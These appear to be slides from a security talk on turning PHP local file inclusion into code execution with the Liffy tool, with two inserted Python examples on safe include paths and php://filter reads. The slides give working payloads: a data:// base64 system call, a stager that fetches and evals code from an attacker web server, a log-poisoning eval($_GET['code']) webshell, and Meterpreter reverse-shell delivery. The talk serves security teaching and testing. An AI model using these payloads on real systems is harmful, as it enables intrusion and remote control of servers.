From Ashy To Classy
LFI Exploitation with Liffy
Agenda
File Inclusion Vulnerability History and Overview
Liffy Introduction
Techniques
Considerations
Future Development
#whoami
Application Security Practice Manager @VerSprite – We love product security!
I <3 Python and Java
Enterprise WebApp Background
CTF player and boot2rooter
Twitters: @rotlogix
Personal Blog: http://rotlogix.com
LFI History and Overview
What is it?
"The process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application." – https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
Issues with include() and require(): untrusted input reaching them ends in code evaluation, not just a file read
Example
<?php include($_GET['file']); ?> = http://target/find.php?file=/etc/passwd
<?php include("files/".$_GET['file'].".php"); ?> = requires traversal "../../" to escape the prefixed directory and a null byte %00 to drop the appended ".php" (null-byte truncation only works on PHP older than 5.3.4)
The problem is passing a user-controlled URL parameter as the file argument of an include or require statement.
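To make the two vulnerable patterns on this slide concrete, here is an added example that is not part of the slides or of Liffy. It models both include statements in Python (reproducing the pre-5.3.4 null-byte truncation so its effect on the resolved path is visible) and puts the containment check that fixes them beside it. The directory name in BASE_DIR and the ALLOWED page names are assumptions.

```python
"""Added example, not Liffy's or the slide's own code: the two vulnerable
include patterns modelled in Python beside the containment check that fixes
them.  BASE_DIR and ALLOWED are assumptions."""
import posixpath

BASE_DIR = "/var/www/app/files"           # assumed include directory


def vulnerable_include_path(user_value: str) -> str:
    """Models <?php include("files/".$_GET['file'].".php"); ?>.

    PHP before 5.3.4 handed the path to the C runtime, so a %00 (NUL) in
    the parameter cut off everything after it, including the forced ".php"
    suffix.  That truncation is reproduced here so the effect of the null
    byte on the resolved path is visible.
    """
    path = BASE_DIR + "/" + user_value + ".php"
    nul = path.find("\x00")
    if nul != -1:
        path = path[:nul]
    return posixpath.normpath(path)


ALLOWED = {"home", "about", "contact"}    # assumed allow-list of page names


def safe_include_path(user_value: str, allowed=None) -> str:
    """Hardened form: reject NUL, optionally allow-list the name, and require
    the normalised path to stay under BASE_DIR.  Raises ValueError for
    anything else, so the caller never includes it.
    """
    if "\x00" in user_value:
        raise ValueError("NUL byte in include name")
    if allowed is not None and user_value not in allowed:
        raise ValueError("include name not in allow-list")
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, user_value + ".php"))
    # Component-wise containment check.  A plain startswith() would accept
    # /var/www/app/files_evil/x.php; commonpath() does not.
    if posixpath.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        raise ValueError("path escapes include directory")
    return candidate


if __name__ == "__main__":
    print(vulnerable_include_path("../../../../etc/passwd\x00"))
    print(safe_include_path("about", ALLOWED))
```

On a real filesystem, resolve the candidate with os.path.realpath before the containment check so a symlink inside the include directory cannot point outside it; posixpath is used above only so the example runs without touching the disk.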
LFI History and Overview
GitHub LULZ
LFI History and Overview
File Inclusion Vulnerabilities have been around forever! 2002?
Around 340 "Inclusion" related entries on Exploit-DB over the last 5 years
Vulnerability dropped from the OWASP Top 10 in 2010 (it was A3, Malicious File Execution, in the 2007 list)
My Opinion? Doesn't matter.
Consider all the legacy PHP applications still in production, and plugin development for things like WordPress
Liffy Introduction
A tool that attempts to turn a seemingly "read-only" LFI vulnerability into a full-blown PHP Meterpreter web shell
Developed in Python
Currently has 10 features, which we will discuss
Uses Python's SimpleHTTPServer module to spawn a web server on demand for payload staging
Major enhancements added by Dan 'unicornFurnace' Crowley @SpiderLabs
Liffy Feature Overview
data:// – stream wrapper (code execution)
php://input – stream wrapper (code execution)
php://filter – stream wrapper (file reads)
expect:// – stream wrapper provided by the expect PECL extension (code execution)
/proc/self/environ – CGI mode (code execution)
Apache access log poisoning (code execution)
Linux auth log poisoning (code execution)
Support for absolute and relative paths (log poisoning)
Support for cookies
Direct or staged payload delivery
Payload Generation
Leverages msfpayload (since replaced by msfvenom in Metasploit)
PHP Meterpreter Reverse TCP (php/meterpreter/reverse_tcp)
Liffy lets you specify your own LHOST and LPORT for the Meterpreter
Creates a corresponding resource file which loads a multi/handler
Direct & Staged Payloads
This simply means directly executing your payload, or using additional code (a stager) to download and execute your payload through the chosen technique (data://, php://input, etc.)
Staged Delivery
Generate PHP Meterpreter through msfpayload (stored: /tmp/{random}.php)
Encode and use <?php eval(file_get_contents('http://local:8000/{random}.php'))?> as the injected code
Spawn a temporary web server to host the shell out of the /tmp directory
Stager downloads and executes the shell
Listening handler catches the reverse shell
Direct Delivery
Generate PHP Meterpreter through msfpayload (stored: /tmp/{random}.php)
Read the payload from the stored file (/tmp/{random}.php)
Encode and send it directly through the wrapper – data://text/html;base64,{payload}
Listening handler catches the reverse shell
Techniques: data://
RFC 2397 – data URL scheme
"Allows the inclusion of small data items as 'immediate' data, as if it had been included externally"
Stream wrapper supported since PHP 5.2.0
Usage: data://text/html;base64,{encoded code here}
Restricted by allow_url_include (enabled / disabled), set in php.ini; it is Off by default
If enabled you would potentially have an RFI as well, since the same setting gates http:// includes
"Allows the use of URL-aware file open wrappers with functions like include"
Techniques: data://
How do we use this?
http://target.com/lfi.php?file=data://text/html;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=
<?php system('whoami'); ?> = PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=
URL-encode any +, / and = in the encoded string when it goes into a query parameter, otherwise a raw + is decoded as a space and the payload is corrupted
Techniques: data://
How does Liffy use this?
Non-Staged:
Generate payload with msfpayload and resource file
Read payload from generated file
Encode the payload
Load listening handler for reverse connections
Deliver it directly: data://text/html;base64,{payload}
Staged:
Generate payload with msfpayload and resource file
Encode <?php eval(file_get_contents('http://attacker:8000/{shell}.php'))?>
Load listening handler for reverse connections
Spawn web server to host payload
Execute
Techniques: data:// > DEMO!
Techniques: php://input
Read-only stream wrapper
Gives the script the raw body of the request (a POST body here), so whatever you send as the body is what gets included
Restricted by allow_url_include
Techniques: php://input
How does Liffy implement this technique?
Exactly the same as data://
Staged and Non-Staged approach
Really you should always choose Non-Staged in this scenario: the code travels in the POST body, so there is no URL length limit and nothing to encode
POST (direct delivery) = Non-Staged
Techniques: php://input > DEMO!
Techniques: SSH auth.log Poisoning
Assumes you can include the SSH auth.log (/var/log/auth.log)
If you can, there is usually a misconfiguration: by default that file is not readable by the web server's user
The process: inject PHP code through failed login attempts, using the code as the username
The code now appears in the auth.log
Include the auth.log for code execution!
Techniques: SSH auth.log Poisoning
Liffy implements this by creating a payload through msfpayload
Reads the PHP payload and assigns it to "payload_1"
Uses <?php eval($_GET['code'])?> as "payload_2"
The second payload is used to poison the auth.log
The first payload is what is passed on the final inclusion: "&code="
Supports path traversal sequences if needed: "../", "..\\", "/../"
Techniques: SSH auth.log Poisoning > DEMO!
Techniques: Apache access.log Poisoning
Requires being able to include the access.log, which means you might have to ../../../ (/var/log/apache2/access.log on Debian-based systems; /var/log/httpd/access_log on Red Hat-based ones)
Poison the log through the User-Agent by injecting PHP code
Include the access.log and your PHP code gets evaluated
Techniques: Apache access.log Poisoning
If you don't specify the log location (you should know it), Liffy defaults to the most common one
Supports path traversal as we already saw with the auth.log
Payload creation is the same, but with direct delivery only
Encodes the payload in base64 and uses eval(base64_decode()); Apache escapes double quotes in logged header values, so raw quotes in the code would cause parse errors
Again, everything gets delivered through the User-Agent
Techniques: Apache access.log Poisoning > DEMO!
Techniques: php://filter
Meta-wrapper that applies filters to a stream as it is opened
Takes a resource argument, which is the file you want to read
Used in conjunction with the base64-encode "conversion filter"
Takes the resource, streams and reads the data, converts it to base64; the output is a base64-encoded string, so the PHP source is returned as text instead of being executed
Example:
http://target.com/vuln/lfi.php?file=php://filter/convert.base64-encode/resource=lfi.php
Techniques: php://filter
Liffy automates this for you!
Prompts you for a file that you want to read
Decodes the encoded string and echoes the contents back to the terminal
Useful for viewing PHP source from files you have access to
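What the php://filter read and the decode step on these two slides look like in code, as an added example that is not Liffy's own implementation. It builds the filter URL from the slide, pulls the encoded file out of a response that wraps the include output in the page's HTML (the usual case), and repairs stripped base64 padding before decoding. The target URL, parameter name and sample response are constructed placeholders.

```python
"""Added example, not Liffy's code: build the php://filter read URL and
recover the file from a page that wraps the include output in HTML.
Target URL, parameter name and the sample response are placeholders."""
import base64
import re
import urllib.parse


def filter_url(base_url, param, resource, conversion="convert.base64-encode"):
    """php://filter with a conversion filter on the stream.  Base64 is the
    usual choice: the PHP source comes back as text instead of being
    executed, and it survives being rendered inside HTML."""
    wrapper = f"php://filter/{conversion}/resource={resource}"
    return f"{base_url}?{param}={urllib.parse.quote(wrapper, safe='/:=')}"


# Base64 run of useful length, optionally padded.  Long alphanumeric runs
# elsewhere in the page (asset hashes, tokens) can match too, so the
# longest candidate is taken; eyeball the decoded text to confirm it is
# source.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_base64(response_body: str) -> str:
    """Pick the encoded file out of the surrounding HTML."""
    runs = _B64_RUN.findall(response_body)
    if not runs:
        raise ValueError("no base64 run found in response")
    return max(runs, key=len)


def decode_filtered_file(response_body: str) -> str:
    """Decode the extracted run, repairing '=' padding that templates or
    proxies sometimes strip, and return the source as text."""
    run = extract_base64(response_body)
    run += "=" * (-len(run) % 4)
    return base64.b64decode(run).decode("utf-8", errors="replace")


# Constructed sample: the vulnerable page's template around the include
# output for resource=lfi.php.
SAMPLE_SOURCE = "<?php include($_GET['file']); ?>"
SAMPLE_RESPONSE = (
    "<html><body><div id='content'>"
    + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
    + "</div><p>footer</p></body></html>"
)


if __name__ == "__main__":
    print(filter_url("http://target.com/vuln/lfi.php", "file", "lfi.php"))
    print(decode_filtered_file(SAMPLE_RESPONSE))
```

Start with the vulnerable script itself as the resource: its source tells you the include prefix and suffix, which decides whether the other techniques need traversal or a null byte.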
Techniques: php://filter > DEMO!
Future Work
Make the internal web server smarter and more reliable
Better Object Oriented design
Re-write the command-line interface
Dynamic request object building and re-use for everything HTTP
Support bypassing filters for path traversals
Write custom PHP reverse shell with built-in handler